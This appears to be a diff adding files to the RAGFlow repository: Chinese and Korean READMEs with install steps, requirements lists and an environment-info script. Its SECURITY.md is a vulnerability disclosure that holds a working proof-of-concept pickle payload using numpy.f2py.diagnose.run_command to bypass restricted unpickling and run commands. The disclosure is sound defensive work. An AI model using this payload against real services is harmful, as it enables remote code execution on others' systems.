227
+ ```bash
228
+ $ conda create -n ragflow python=3.11.0
229
+ $ conda activate ragflow
230
+ $ pip install -r requirements.txt
231
+ ```
232
+
233
+ ```bash
234
+ # CUDA 버전이 12.0보다 높은 경우, 다음 명령어를 추가로 실행하세요:
235
+ $ pip uninstall -y onnxruntime-gpu
236
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
237
+ ```
238
+
239
+ 3. 진입 스크립트를 복사하고 환경 변수를 설정하세요:
240
+ ```bash
241
+ # 파이썬 경로를 받아옵니다:
242
+ $ which python
243
+ # RAGFlow 프로젝트 경로를 받아옵니다:
244
+ $ pwd
245
+ ```
246
+
247
+ ```bash
248
+ $ cp docker/entrypoint.sh .
249
+ $ vi entrypoint.sh
250
+ ```
251
+
252
+ ```bash
253
+ # 실제 상황에 맞게 설정 조정하기 (다음 두 개의 export 명령어는 새로 추가되었습니다):
254
+ # - `which python`의 결과를 `PY`에 할당합니다.
255
+ # - `pwd`의 결과를 `PYTHONPATH`에 할당합니다.
256
+ # - `LD_LIBRARY_PATH`가 설정되어 있는 경우 주석 처리합니다.
257
+ # - 선택 사항: Hugging Face 미러 추가.
258
+ PY=${PY}
259
+ export PYTHONPATH=${PYTHONPATH}
260
+ export HF_ENDPOINT=https://hf-mirror.com
261
+ ```
262
+
263
+ 4. 다른 서비스(MinIO, Elasticsearch, Redis, MySQL)를 시작하세요:
264
+ ```bash
265
+ $ cd docker
266
+ $ docker compose -f docker-compose-base.yml up -d
267
+ ```
268
+
269
+ 5. 설정 파일을 확인하여 다음 사항을 확인하세요:
270
+ - **docker/.env**의 설정이 **conf/service_conf.yaml**의 설정과 일치하는지 확인합니다.
271
+ - **service_conf.yaml**의 관련 서비스에 대한 IP 주소와 포트가 로컬 머신의 IP 주소와 컨테이너에서 노출된 포트와 일치하는지 확인합니다.
272
+
273
+
274
+ 6. RAGFlow 백엔드 서비스를 시작합니다:
275
+
276
+ ```bash
277
+ $ chmod +x ./entrypoint.sh
278
+ $ bash ./entrypoint.sh
279
+ ```
280
+
281
+ 7. 프론트엔드 서비스를 시작합니다:
282
+
283
+ ```bash
284
+ $ cd web
285
+ $ npm install --registry=https://registry.npmmirror.com --force
286
+ $ vim .umirc.ts
287
+ # proxy.target을 http://127.0.0.1:9380로 업데이트합니다.
288
+ $ npm run dev
289
+ ```
290
+
291
+ 8. 프론트엔드 서비스를 배포합니다:
292
+
293
+ ```bash
294
+ $ cd web
295
+ $ npm install --registry=https://registry.npmmirror.com --force
296
+ $ umi build
297
+ $ mkdir -p /ragflow/web
298
+ $ cp -r dist /ragflow/web
299
+ $ apt install nginx -y
300
+ $ cp ../docker/nginx/proxy.conf /etc/nginx
301
+ $ cp ../docker/nginx/nginx.conf /etc/nginx
302
+ $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
303
+ $ systemctl start nginx
304
+ ```
305
+
306
+ ## 📚 문서
307
+
308
+ - [Quickstart](https://ragflow.io/docs/dev/)
309
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
310
+ - [References](https://ragflow.io/docs/dev/category/references)
311
+ - [FAQ](https://ragflow.io/docs/dev/faq)
312
+
313
+ ## 📜 로드맵
314
+
315
+ [RAGFlow 로드맵 2024](https://github.com/infiniflow/ragflow/issues/162)을 확인하세요.
316
+
317
+ ## 🏄 커뮤니티
318
+
319
+ - [Discord](https://discord.gg/4XxujFgUN7)
320
+ - [Twitter](https://twitter.com/infiniflowai)
321
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
322
+
323
+ ## 🙌 컨트리뷰션
324
+
325
+ RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./docs/references/CONTRIBUTING.md)을 검토해 주세요.
README_zh.md ADDED
@@ -0,0 +1,329 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
22
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
23
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
24
+ </a>
25
+ </p>
26
+
27
+ <h4 align="center">
28
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
29
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
30
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
31
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
32
+ <a href="https://demo.ragflow.io">Demo</a>
33
+ </h4>
34
+
35
+ ## 💡 RAGFlow 是什么?
36
+
37
+ [RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
38
+
39
+ ## 🎮 Demo 试用
40
+
41
+ 请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
42
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
43
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
44
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
45
+ </div>
46
+
47
+
48
+ ## 🔥 近期更新
49
+
50
+ - 2024-09-13 增加知识库问答搜索模式。
51
+ - 2024-09-09 在 Agent 中加入医疗问诊模板。
52
+ - 2024-08-22 支持用RAG技术实现从自然语言到SQL语句的转换。
53
+ - 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
54
+ - 2024-07-23 支持解析音频文件。
55
+ - 2024-07-08 支持 Agentic RAG: 基于 [Graph](./agent/README.md) 的工作流。
56
+ - 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件,支持提取出 Docx 文件中的图片和 Markdown 文件中的表格。
57
+ - 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
58
+
59
+ ## 🌟 主要功能
60
+
61
+ ### 🍭 **"Quality in, quality out"**
62
+
63
+ - 基于[深度文档理解](./deepdoc/README.md),能够从各类复杂格式的非结构化数据中提取真知灼见。
64
+ - 真正在无限上下文(token)的场景下快速完成大海捞针测试。
65
+
66
+ ### 🍱 **基于模板的文本切片**
67
+
68
+ - 不仅仅是智能,更重要的是可控可解释。
69
+ - 多种文本模板可供选择
70
+
71
+ ### 🌱 **有理有据、最大程度降低幻觉(hallucination)**
72
+
73
+ - 文本切片过程可视化,支持手动调整。
74
+ - 有理有据:答案提供关键引用的快照并支持追根溯源。
75
+
76
+ ### 🍔 **兼容各类异构数据源**
77
+
78
+ - 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
79
+
80
+ ### 🛀 **全程无忧、自动化的 RAG 工作流**
81
+
82
+ - 全面优化的 RAG 工作流可以支持从个人应用乃至超大型企业的各类生态系统。
83
+ - 大语言模型 LLM 以及向量模型均支持配置。
84
+ - 基于多路召回、融合重排序。
85
+ - 提供易用的 API,可以轻松集成到各类企业系统。
86
+
87
+ ## 🔎 系统架构
88
+
89
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
90
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
91
+ </div>
92
+
93
+ ## 🎬 快速开始
94
+
95
+ ### 📝 前提条件
96
+
97
+ - CPU >= 4 核
98
+ - RAM >= 16 GB
99
+ - Disk >= 50 GB
100
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
101
+ > 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
102
+
103
+ ### 🚀 启动服务器
104
+
105
+ 1. 确保 `vm.max_map_count` 不小于 262144:
106
+
107
+ > 如需确认 `vm.max_map_count` 的大小:
108
+ >
109
+ > ```bash
110
+ > $ sysctl vm.max_map_count
111
+ > ```
112
+ >
113
+ > 如果 `vm.max_map_count` 的值小于 262144,可以进行重置:
114
+ >
115
+ > ```bash
116
+ > # 这里我们设为 262144:
117
+ > $ sudo sysctl -w vm.max_map_count=262144
118
+ > ```
119
+ >
120
+ > 你的改动会在下次系统重启时被重置。如果希望做永久改动,还需要在 **/etc/sysctl.conf** 文件里把 `vm.max_map_count` 的值再相应更新一遍:
121
+ >
122
+ > ```bash
123
+ > vm.max_map_count=262144
124
+ > ```
125
+
126
+ 2. 克隆仓库:
127
+
128
+ ```bash
129
+ $ git clone https://github.com/infiniflow/ragflow.git
130
+ ```
131
+
132
+ 3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
133
+
134
+ ```bash
135
+ $ cd ragflow/docker
136
+ $ chmod +x ./entrypoint.sh
137
+ $ docker compose -f docker-compose-CN.yml up -d
138
+ ```
139
+
140
+ > 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.11.0,然后运行上述命令。
141
+
142
+ > 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
143
+
144
+ 4. 服务器启动成功后再次确认服务器状态:
145
+
146
+ ```bash
147
+ $ docker logs -f ragflow-server
148
+ ```
149
+
150
+ _出现以下界面提示说明服务器启动成功:_
151
+
152
+ ```bash
153
+ ____ ______ __
154
+ / __ \ ____ _ ____ _ / ____// /____ _ __
155
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
156
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
157
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
158
+ /____/
159
+
160
+ * Running on all addresses (0.0.0.0)
161
+ * Running on http://127.0.0.1:9380
162
+ * Running on http://x.x.x.x:9380
163
+ INFO:werkzeug:Press CTRL+C to quit
164
+ ```
165
+ > 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network abnormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
166
+
167
+ 5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
168
+ > 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
169
+ 6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
170
+
171
+ > 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
172
+
173
+ _好戏开始,接着奏乐接着舞!_
174
+
175
+ ## 🔧 系统配置
176
+
177
+ 系统配置涉及以下三份文件:
178
+
179
+ - [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
180
+ - [service_conf.yaml](./docker/service_conf.yaml):配置各类后台服务。
181
+ - [docker-compose-CN.yml](./docker/docker-compose-CN.yml): 系统依赖该文件完成启动。
182
+
183
+ 请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml](./docker/service_conf.yaml) 文件中的配置保持一致!
184
+
185
+ > [./docker/README](./docker/README.md) 文件提供了环境变量设置和服务配置的详细信息。请**一定要**确保 [./docker/README](./docker/README.md) 文件当中列出来的环境变量的值与 [service_conf.yaml](./docker/service_conf.yaml) 文件当中的系统配置保持一致。
186
+
187
+ 如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose-CN.yml](./docker/docker-compose-CN.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
188
+
189
+ > 所有系统配置都需要通过系统重启生效:
190
+ >
191
+ > ```bash
192
+ > $ docker compose -f docker-compose-CN.yml up -d
193
+ > ```
194
+
195
+ ## 🛠️ 源码编译、安装 Docker 镜像
196
+
197
+ 如需从源码安装 Docker 镜像:
198
+
199
+ ```bash
200
+ $ git clone https://github.com/infiniflow/ragflow.git
201
+ $ cd ragflow/
202
+ $ docker build -t infiniflow/ragflow:v0.11.0 .
203
+ $ cd docker
204
+ $ chmod +x ./entrypoint.sh
205
+ $ docker compose up -d
206
+ ```
207
+
208
+ ## 🛠️ 源码启动服务
209
+
210
+ 如需从源码启动服务,请参考以下步骤:
211
+
212
+ 1. 克隆仓库
213
+
214
+ ```bash
215
+ $ git clone https://github.com/infiniflow/ragflow.git
216
+ $ cd ragflow/
217
+ ```
218
+
219
+ 2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
220
+
221
+ ```bash
222
+ $ conda create -n ragflow python=3.11.0
223
+ $ conda activate ragflow
224
+ $ pip install -r requirements.txt
225
+ ```
226
+ 如果 cuda > 12.0,需额外执行以下命令:
227
+ ```bash
228
+ $ pip uninstall -y onnxruntime-gpu
229
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
230
+ ```
231
+
232
+ 3. 拷贝入口脚本并配置环境变量
233
+
234
+ ```bash
235
+ $ cp docker/entrypoint.sh .
236
+ $ vi entrypoint.sh
237
+ ```
238
+ 使用以下命令获取python路径及ragflow项目路径:
239
+ ```bash
240
+ $ which python
241
+ $ pwd
242
+ ```
243
+
244
+ 将上述 `which python` 的输出作为 `PY` 的值,将 `pwd` 的输出作为 `PYTHONPATH` 的值。
245
+
246
+ `LD_LIBRARY_PATH` 如果环境已经配置好,可以注释掉。
247
+
248
+ ```bash
249
+ # 此处配置需要按照实际情况调整,两个 export 为新增配置
250
+ PY=${PY}
251
+ export PYTHONPATH=${PYTHONPATH}
252
+ # 可选:添加 Hugging Face 镜像
253
+ export HF_ENDPOINT=https://hf-mirror.com
254
+ ```
255
+
256
+ 4. 启动基础服务
257
+
258
+ ```bash
259
+ $ cd docker
260
+ $ docker compose -f docker-compose-base.yml up -d
261
+ ```
262
+
263
+ 5. 检查配置文件
264
+ 确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
265
+
266
+ 6. 启动服务
267
+
268
+ ```bash
269
+ $ chmod +x ./entrypoint.sh
270
+ $ bash ./entrypoint.sh
271
+ ```
272
+
273
+ 7. 启动WebUI服务
274
+
275
+ ```bash
276
+ $ cd web
277
+ $ npm install --registry=https://registry.npmmirror.com --force
278
+ $ vim .umirc.ts
279
+ # 修改proxy.target为http://127.0.0.1:9380
280
+ $ npm run dev
281
+ ```
282
+
283
+ 8. 部署WebUI服务
284
+
285
+ ```bash
286
+ $ cd web
287
+ $ npm install --registry=https://registry.npmmirror.com --force
288
+ $ umi build
289
+ $ mkdir -p /ragflow/web
290
+ $ cp -r dist /ragflow/web
291
+ $ apt install nginx -y
292
+ $ cp ../docker/nginx/proxy.conf /etc/nginx
293
+ $ cp ../docker/nginx/nginx.conf /etc/nginx
294
+ $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
295
+ $ systemctl start nginx
296
+ ```
297
+ ## 📚 技术文档
298
+
299
+ - [Quickstart](https://ragflow.io/docs/dev/)
300
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
301
+ - [References](https://ragflow.io/docs/dev/category/references)
302
+ - [FAQ](https://ragflow.io/docs/dev/faq)
303
+
304
+ ## 📜 路线图
305
+
306
+ 详见 [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162) 。
307
+
308
+ ## 🏄 开源社区
309
+
310
+ - [Discord](https://discord.gg/4XxujFgUN7)
311
+ - [Twitter](https://twitter.com/infiniflowai)
312
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
313
+
314
+ ## 🙌 贡献指南
315
+
316
+ RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./docs/references/CONTRIBUTING.md) 。
317
+
318
+ ## 🤝 商务合作
319
+
320
+ - [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
321
+
322
+ ## 👥 加入社区
323
+
324
+ 扫二维码添加 RAGFlow 小助手,进 RAGFlow 交流群。
325
+
326
+ <p align="center">
327
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
328
+ </p>
329
+
SECURITY.md ADDED
@@ -0,0 +1,74 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Security Policy
2
+
3
+ ## Supported Versions
4
+
5
+ The table below lists the RAGFlow versions that are
6
+ currently being supported with security updates.
7
+
8
+ | Version | Supported |
9
+ | ------- | ------------------ |
10
+ | <=0.7.0 | :white_check_mark: |
11
+
12
+ ## Reporting a Vulnerability
13
+
14
+ ### Branch name
15
+
16
+ main
17
+
18
+ ### Actual behavior
19
+
20
+ The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable, leading to code execution.
21
+ The main reason is that the numpy module has a numpy.f2py.diagnose.run_command function that directly executes commands, while the restricted_loads function allows users to import any function from the numpy module.
22
+
23
+
24
+ ### Steps to reproduce
25
+
26
+
27
+ **ragflow_patch.py**
28
+
29
+ ```py
30
+ import builtins
31
+ import io
32
+ import pickle
33
+
34
+ safe_module = {
35
+ 'numpy',
36
+ 'rag_flow'
37
+ }
38
+
39
+
40
+ class RestrictedUnpickler(pickle.Unpickler):
41
+ def find_class(self, module, name):
42
+ import importlib
43
+ if module.split('.')[0] in safe_module:
44
+ _module = importlib.import_module(module)
45
+ return getattr(_module, name)
46
+ # Forbid everything else.
47
+ raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
48
+ (module, name))
49
+
50
+
51
+ def restricted_loads(src):
52
+ """Helper function analogous to pickle.loads()."""
53
+ return RestrictedUnpickler(io.BytesIO(src)).load()
54
+ ```
55
+ Then, **PoC.py**
56
+ ```py
57
+ import pickle
58
+ from ragflow_patch import restricted_loads
59
+ class Exploit:
60
+ def __reduce__(self):
61
+ import numpy.f2py.diagnose
62
+ return numpy.f2py.diagnose.run_command, ('whoami', )
63
+
64
+ Payload=pickle.dumps(Exploit())
65
+ restricted_loads(Payload)
66
+ ```
67
+ **Result**
68
+ ![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
69
+
70
+
71
+ ### Additional information
72
+
73
+ #### How to prevent?
74
+ Strictly filter both the module and the name before calling the getattr function.
printEnvironment.sh ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/bin/bash
2
+
3
+ # The function is used to obtain distribution information
4
+ get_distro_info() {
5
+ local distro_id=$(lsb_release -i -s 2>/dev/null)
6
+ local distro_version=$(lsb_release -r -s 2>/dev/null)
7
+ local kernel_version=$(uname -r)
8
+
9
+ # If lsb_release is not available, try parsing the /etc/*-release files
10
+ if [ -z "$distro_id" ] || [ -z "$distro_version" ]; then
11
+ distro_id=$(grep '^ID=' /etc/*-release | cut -d= -f2 | tr -d '"')
12
+ distro_version=$(grep '^VERSION_ID=' /etc/*-release | cut -d= -f2 | tr -d '"')
13
+ fi
14
+
15
+ echo "$distro_id $distro_version (Kernel version: $kernel_version)"
16
+ }
17
+
18
+ # get Git repo name
19
+ git_repo_name=''
20
+ if git rev-parse --is-inside-work-tree > /dev/null 2>&1; then
21
+ git_repo_name=$(basename "$(git rev-parse --show-toplevel)")
22
+ if [ $? -ne 0 ]; then
23
+ git_repo_name="(Can't get repo name)"
24
+ fi
25
+ else
26
+ git_repo_name="It NOT a Git repo"
27
+ fi
28
+
29
+ # get CPU type
30
+ cpu_model=$(uname -m)
31
+
32
+ # get memory size
33
+ memory_size=$(free -h | grep Mem | awk '{print $2}')
34
+
35
+ # get docker version
36
+ docker_version=''
37
+ if command -v docker &> /dev/null; then
38
+ docker_version=$(docker --version | cut -d ' ' -f3)
39
+ else
40
+ docker_version="Docker not installed"
41
+ fi
42
+
43
+ # get python version
44
+ python_version=''
45
+ if command -v python &> /dev/null; then
46
+ python_version=$(python --version | cut -d ' ' -f2)
47
+ else
48
+ python_version="Python not installed"
49
+ fi
50
+
51
+ # Print all information
52
+ echo "Current Repo: $git_repo_name"
53
+
54
+ # get Commit ID
55
+ git_version=$(git log -1 --pretty=format:'%h')
56
+
57
+ if [ -z "$git_version" ]; then
58
+ echo "Commit Id: The current directory is not a Git repository, or the Git command is not installed."
59
+ else
60
+ echo "Commit Id: $git_version"
61
+ fi
62
+
63
+ echo "Operating system: $(get_distro_info)"
64
+ echo "CPU Type: $cpu_model"
65
+ echo "Memory: $memory_size"
66
+ echo "Docker Version: $docker_version"
67
+ echo "Python Version: $python_version"
requirements.txt ADDED
@@ -0,0 +1,104 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ akshare==1.14.72
2
+ azure-storage-blob==12.22.0
3
+ azure-identity==1.17.1
4
+ azure-storage-file-datalake==12.16.0
5
+ anthropic==0.34.1
6
+ arxiv==2.1.3
7
+ Aspose.Slides==24.2.0
8
+ BCEmbedding==0.1.3
9
+ Bio==1.7.1
10
+ boto3==1.34.140
11
+ botocore==1.34.140
12
+ cachetools==5.3.3
13
+ chardet==5.2.0
14
+ cn2an==0.5.22
15
+ cohere==5.6.2
16
+ dashscope==1.14.1
17
+ datrie==0.8.2
18
+ deepl==1.18.0
19
+ demjson3==3.0.6
20
+ discord.py==2.3.2
21
+ duckduckgo_search==6.1.9
22
+ editdistance==0.8.1
23
+ elastic_transport==8.12.0
24
+ elasticsearch==8.12.1
25
+ elasticsearch_dsl==8.12.0
26
+ fastembed==0.2.6
27
+ fasttext==0.9.3
28
+ filelock==3.15.4
29
+ FlagEmbedding==1.2.10
30
+ Flask==3.0.3
31
+ Flask_Cors==5.0.0
32
+ Flask_Login==0.6.3
33
+ flask_session==0.8.0
34
+ google_search_results==2.4.2
35
+ groq==0.9.0
36
+ hanziconv==0.3.2
37
+ html_text==0.6.2
38
+ httpx==0.27.0
39
+ huggingface_hub==0.20.3
40
+ infinity_emb==0.0.51
41
+ itsdangerous==2.1.2
42
+ Markdown==3.6
43
+ markdown_to_json==2.1.1
44
+ minio==7.2.4
45
+ mistralai==0.4.2
46
+ nltk==3.9
47
+ numpy==1.26.4
48
+ ollama==0.2.1
49
+ onnxruntime==1.17.3
50
+ onnxruntime_gpu==1.17.1
51
+ openai==1.12.0
52
+ opencv_python==4.9.0.80
53
+ opencv_python_headless==4.9.0.80
54
+ openpyxl==3.1.2
55
+ ormsgpack==1.5.0
56
+ pandas==2.2.2
57
+ pdfplumber==0.10.4
58
+ peewee==3.17.1
59
+ Pillow==10.3.0
60
+ pipreqs==0.5.0
61
+ protobuf==5.27.2
62
+ psycopg2-binary==2.9.9
63
+ pyclipper==1.3.0.post5
64
+ pycryptodomex==3.20.0
65
+ pypdf==4.3.0
66
+ PyPDF2==3.0.1
67
+ pytest==8.2.2
68
+ python-dotenv==1.0.1
69
+ python_dateutil==2.8.2
70
+ python_pptx==0.6.23
71
+ pywencai==0.12.2
72
+ qianfan==0.4.6
73
+ ranx==0.3.20
74
+ readability_lxml==0.8.1
75
+ redis==5.0.3
76
+ Requests==2.32.2
77
+ replicate==0.31.0
78
+ roman_numbers==1.0.2
79
+ ruamel.base==1.0.0
80
+ scholarly==1.7.11
81
+ scikit_learn==1.5.0
82
+ selenium==4.22.0
83
+ setuptools==70.0.0
84
+ Shapely==2.0.5
85
+ six==1.16.0
86
+ StrEnum==0.4.15
87
+ tabulate==0.9.0
88
+ tencentcloud-sdk-python==3.0.1215
89
+ tika==2.6.0
90
+ tiktoken==0.6.0
91
+ torch==2.3.0
92
+ transformers==4.38.1
93
+ umap==0.1.1
94
+ vertexai==1.64.0
95
+ volcengine==1.0.146
96
+ voyageai==0.2.3
97
+ webdriver_manager==4.0.1
98
+ Werkzeug==3.0.3
99
+ wikipedia==1.4.0
100
+ word2number==1.1
101
+ xgboost==2.1.0
102
+ xpinyin==0.7.6
103
+ yfinance==0.1.96
104
+ zhipuai==2.0.1
requirements_arm.txt ADDED
@@ -0,0 +1,175 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ accelerate==0.27.2
2
+ aiohttp==3.10.2
3
+ aiosignal==1.3.1
4
+ annotated-types==0.6.0
5
+ anthropic==0.34.1
6
+ anyio==4.3.0
7
+ argon2-cffi==23.1.0
8
+ argon2-cffi-bindings==21.2.0
9
+ #Aspose.Slides==24.2.0
10
+ attrs==23.2.0
11
+ blinker==1.7.0
12
+ cachelib==0.12.0
13
+ cachetools==5.3.3
14
+ certifi==2024.7.4
15
+ cffi==1.16.0
16
+ charset-normalizer==3.3.2
17
+ click==8.1.7
18
+ cohere==5.6.2
19
+ coloredlogs==15.0.1
20
+ cryptography==43.0.1
21
+ dashscope==1.14.1
22
+ datasets==2.17.1
23
+ datrie==0.8.2
24
+ demjson3==3.0.6
25
+ dill==0.3.8
26
+ distro==1.9.0
27
+ elastic-transport==8.12.0
28
+ elasticsearch==8.12.1
29
+ elasticsearch-dsl==8.12.0
30
+ et-xmlfile==1.1.0
31
+ filelock==3.13.1
32
+ fastembed==0.2.6
33
+ FlagEmbedding==1.2.5
34
+ Flask==3.0.2
35
+ Flask-Cors==5.0.0
36
+ Flask-Login==0.6.3
37
+ Flask-Session==0.6.0
38
+ flatbuffers==23.5.26
39
+ frozenlist==1.4.1
40
+ fsspec==2023.10.0
41
+ h11==0.14.0
42
+ hanziconv==0.3.2
43
